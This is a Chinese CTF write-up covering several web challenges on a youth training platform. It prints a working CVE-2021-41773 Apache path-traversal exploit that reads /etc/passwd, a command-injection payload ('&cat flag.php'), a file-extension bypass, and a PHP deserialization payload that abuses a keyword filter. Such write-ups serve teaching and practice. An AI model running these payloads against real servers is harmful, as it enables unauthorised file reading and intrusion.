青少年CTF训练平台-WEB-部分wp-2

水文的一天

XX-API

任意文件读取漏洞

登陆后台

漏洞考察点: CVE_2021_41773

题目提示Apache

请求发现 apache版本为 2.4.49

找到CVE漏洞CVE-2021-41773

攻击者利用这个漏洞，可以读取到Apache服务器Web目录以外的其他文件，或者读取Web中的脚本源码，或者在开启cgi或cgid的服务器上执行任意命令。

两种方法:

第一种curl请求

curl -v --path-as-is http://IP地址/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

第二种:

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/flag HTTP/1.1
Host: IP地址
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Connection: close

浏览器直接访问url会失败

signin

绕过pathinfo，这里大小写可以绕过。

不过题目环境好像不解析大写PHP。

所以只能通过第二种方法:

在文件后面添加/.进行绕过

获取flag

PingMe

命令执行

&cat flag.php

Web_unserialize

扫描目录发现备份文件

发现序列化代码

在nickname处可以进行数组绕过.所以我们构造的payload在 nickname处。

调用了update_profile()函数

	public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);

		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);
	}

update函数代码

public function update($table, $key, $value, $where) {
		$sql = "UPDATE $table SET $key = '$value' WHERE $where";
		return mysql_query($sql);
	}

filter代码

public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}

构造Payload

 
class b
 
{
 
    public $phone = "12345678901";
 
    public $email = "[email protected]";
 	
    public $nickname = array("wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere");
 
    public $photo = "config.php";
 
}
 
$a=new b();
 
$profile = serialize($a);
 
echo $profile;
 
?>

发送请求

解密base64

获取flag